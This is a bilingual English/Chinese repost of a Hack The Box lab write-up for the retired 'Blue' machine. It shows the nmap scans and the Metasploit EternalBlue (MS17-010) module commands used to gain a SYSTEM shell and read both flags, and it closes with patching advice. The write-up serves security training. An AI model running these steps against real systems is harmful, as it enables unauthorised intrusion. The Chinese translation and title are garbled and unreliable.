推箱子2-向右推!_保持冷静并砍箱子-蓝色

推箱子2-向右推!

Hack The Box (HTB) is an online platform that allows you to test your penetration testing skills.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。

It contains several challenges that are constantly updated. Some of them simulate real world scenarios and some of them lean more towards a CTF style of challenge.

它包含一些不断更新的挑战。 其中一些模拟现实世界的场景，而另一些则更倾向于CTF挑战风格。

Note: Only write-ups of retired HTB machines are allowed.

注意 ： 只允许报废HTB机器。

Blue is one of the simplest machines on Hack The Box. But it demonstrates the impact of the EternalBlue exploit, which has been used to compromise companies through large-scale ransomware and crypto-mining attacks.

Blue是Hack The Box上最简单的机器之一。 但这证明了EternalBlue漏洞的影响，该漏洞已通过大规模勒索软件和加密货币挖矿攻击来危害公司。

We will use the following tools to pawn the box on a Kali Linux box:

我们将使用以下工具在Kali Linux盒子上放置盒子 ：

• nmap
  纳帕
• searchsploit
  searchsploit
• metasploit
  元胞
• meterpreter
  抄表员

Let's get started.

让我们开始吧。

First, I add Blue on the /etc/hosts file.

首先，我在/ etc / hosts文件中添加Blue 。

nano /etc/hosts

with

与

10.10.10.40     blue.htb

第1步-侦察 (Step 1 - Reconnaissance)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。 在此阶段花更多的时间来获取尽可能多的信息总是更好的选择。

端口扫描 (Port scanning)

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing.

我将使用Nmap (网络映射器)。 Nmap是一个免费的开源实用程序，用于网络发现和安全审核。

It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用许多命令来扫描网络。 如果您想了解更多信息，可以在这里查看文档。

I use the following command to perform an intensive scan:

我使用以下命令执行密集扫描：

nmap -A -v blue.htb

-A: Enables OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increases verbosity level

-v：提高详细程度

blue.htb: hostname for the Blue box

blue .htb：蓝色框的主机名

If you find the results a little bit too overwhelming, you can try this:

如果您发现结果有点不堪重负，则可以尝试以下操作：

nmap blue.htb

We can see that there are quite a few open ports including:

我们可以看到有很多开放的端口，包括：

Port 445, Microsoft-DS (Directory Services) SMB file sharing

端口 445 ，Microsoft-DS(目录服务)SMB文件共享

From the nmap scan, we have some information concerning the computer name (haris-PC) and the SMB version (2.02).

通过nmap扫描，我们可以获得有关计算机名称(haris-PC)和SMB版本(2.02)的一些信息。

The Server Message Block (SMB) is a network protocol that enables users to communicate with remote computers and servers in order to use their resources or share, open, and edit files.

服务器消息块(SMB)是一种网络协议，使用户可以与远程计算机和服务器进行通信，以使用其资源或共享，打开和编辑文件。

From the name of this box and that it's a Windows machine with port 445 opened, we can assume the machine is vulnerable to EternalBlue. I use an nmap script to verify this information with the following:

从此框的名称开始，这是一台打开了端口445的Windows计算机，我们可以假定该计算机易受EternalBlue攻击。 我使用nmap脚本通过以下方式验证此信息：

nmap --script vuln -p 445 blue.htb

We can see that the box is vulnerable to a Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010).

我们可以看到该包装盒容易受到Microsoft SMBv1服务器(ms17-010)中的“远程执行代码”漏洞的攻击。

第2步-了解ms17-010 (Step 2 - Understanding ms17-010)

What is ms17-010?

什么是ms17-010？

EternalBlue is a cyberattack exploit developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft released patches for the vulnerability - Wikipedia

EternalBlue是由美国国家安全局(NSA)开发的网络攻击利用。 在Microsoft发布漏洞修补程序一个月后，Shadow Brokers黑客组织于2017年4月14日将其泄漏-维基百科

You can read more here. This vulnerability was patched and is listed on Microsoft’s Security Bulletin as MS17-010.

您可以阅读更多 在这里 。 已修复此漏洞，并在Microsoft的安全公告中将其列为MS17-010。

EternalBlue allows hackers to remotely execute arbitrary code to gain access to a network. It exploits a vulnerability in the Windows OS SMB protocol. The exploit can compromise the entire network and devices connected to it.

EternalBlue允许黑客远程执行任意代码以访问网络。 它利用Windows OS SMB协议中的漏洞。 该漏洞可能危害整个网络和与其连接的设备。

Malware that utilises EternalBlue can propagate across networks. In 2017, WannaCry – a crypto-ransomware – used the EternalBlue exploit which spread itself across the network infecting all connected devices.

利用EternalBlue的恶意软件可以跨网络传播。 2017年， WannaCry (一种加密勒索软件)使用了EternalBlue漏洞，该漏洞在网络中传播，感染了所有连接的设备。

步骤3-利用EternalBlue (Step 3 - Exploiting EternalBlue)

I use Searchsploit to check if there is any known exploit. Searchsploit is a command line search tool for Exploit Database.

我使用Searchsploit检查是否存在任何已知漏洞。 Searchsploit是Exploit Database的命令行搜索工具。

I use the following command:

我使用以下命令：

searchsploit eternalblue

I can get more details on an exploit with:

我可以通过以下方式获得有关漏洞利用的更多详细信息：

searchsploit -x 41738.py

You can also check the Exploit Database to find the exploit.

您还可以检查漏洞利用数据库以查找漏洞利用。

There is one Metasploit module available.

有一个可用的Metasploit模块。

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders.

我们将使用Metasploit ，它是一种渗透测试框架，可使黑客攻击变得简单。 对于许多攻击者和防御者来说，它是必不可少的工具。

I launch the Metasploit Framework on Kali and look for the command I should use for the exploit.

我在Kali上启动Metasploit框架 ，并寻找用于漏洞利用的命令。

Don't forget to update Metasploit when you launch it with this command:

使用以下命令启动Metasploit时，请不要忘记对其进行更新：

msfupdate

You can also check if the target is vulnerable to EternalBlue on Metasploit using an auxiliary. Start with this command:

您还可以使用辅助工具检查目标是否易受Metasploit上的EternalBlue攻击。 从以下命令开始：

search eternalblue

then in that case

然后在那种情况下

use 1

to select

选择

auxiliary/scanner/smb/smb_ms17_010

You can check the options with

您可以使用

show options

and set RHOSTS with

并设置RHOSTS与

set RHOSTS blue.htb

Then run the auxiliary with

然后用

run

You can see that the host is likely to be vulnerable to MS17-010!

您会看到主机可能容易受到MS17-010的攻击！

Let's now check the exploit with

现在让我们来检查漏洞利用

use 2

or the command

或命令

exploit/windows/smb/ms17_010_eternalblue

We need to set up the options for RHOSTS

我们需要为RHOSTS设置选项

and LHOST – mine was 10.10.14.24. You will need to set it up with your own LHOST. You can check yours here.

和LHOST-我的是10.10.14.24。 您将需要使用自己的LHOST进行设置。 您可以在这里检查您的。

Before running the exploit, you can check here if the machine is vulnerable – this will run the auxiliary we used earlier with the command

在运行漏洞利用程序之前，您可以在此处检查计算机是否易受攻击-这将运行我们之前使用该命令使用的辅助程序

check

I then run the exploit with

然后，我使用

run

The exploit had to run several times before I got a Meterpreter session.

在我进行Meterpreter会话之前，该漏洞利用必须运行几次。

Here's the definition of Meterpreter from Offensive Security:

这是来自Offensive Security的Meterpreter的定义：

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter是一种高级的，动态可扩展的有效负载，它使用内存中的 DLL注入暂存器，并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信，并提供全面的客户端Ruby API。 它具有命令历史记录，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此处阅读有关Meterpreter的更多信息。

Let's start by gathering some information.

让我们开始收集一些信息。

getuid returns the real user ID of the calling process.

getuid返回调用过程的真实用户ID。

NT Authority\SYSTEM or LocalSystem account is a built-in Windows account. It is the most powerful account on a Windows local instance. We have admin access on that machine.

NT Authority \ SYSTEM或LocalSystem帐户是内置的Windows帐户。 它是Windows本地实例上功能最强大的帐户。 我们在该计算机上拥有管理员访问权限。

第 4 步 -寻找user.txt标志 (Step 4 - Looking for the user.txt flag)

I navigate to the haris folder from Documents and Settings.

我从“ 文档和设置”导航到haris文件夹。

I can list all the files/folders with the following command:

我可以使用以下命令列出所有文件/文件夹：

ls -la

I then move to the Desktop with

我然后移动到桌面用

cd Desktop

And I find the user flag! I can check the contents of the file with

而且我找到了用户标志！ 我可以检查文件的内容

cat user.txt

第5步-寻找root.txt标志 (Step 5 - Looking for the root.txt flag)

Let's find the root flag now. I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

现在让我们找到根标志。 我向上导航至“ 用户”并签入“ 管理员 / 桌面”文件夹。 我找到了旗帜！

I use the following command to see the content of the file:

我使用以下命令查看文件的内容：

cat root.txt

Congrats! You found both flags.

恭喜！ 您找到了两个标志。

补救措施 (Remediations)

• Patch your devices with the security update for Microsoft Windows SMB v1. You can check the Microsoft Security Bulletin to see which OS's are affected

  使用Microsoft Windows SMB v1的安全更新对设备进行修补。 您可以查看Microsoft安全公告以查看受影响的操作系统

• Disable SMB v1 and use SMB v2 or v3
  禁用SMB v1并使用SMB v2或v3

• Apply the principle of least privilege to all your systems and services

  将最低特权原则应用于您的所有系统和服务

Please don’t hesitate to comment, ask questions or share with your friends :)

请不要犹豫，发表评论，提问或与您的朋友分享:)

You can see more articles from the series Keep Calm and Hack the Box here.

您可以从“ 保持冷静并打破僵局”系列中看到更多文章 在这里 。

You can follow me on Twitter or on LinkedIn.

您可以在Twitter或LinkedIn上关注我。

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘记＃ GetSecure ，＃ BeSecure和＃StaySecure ！

翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-blue/

推箱子2-向右推!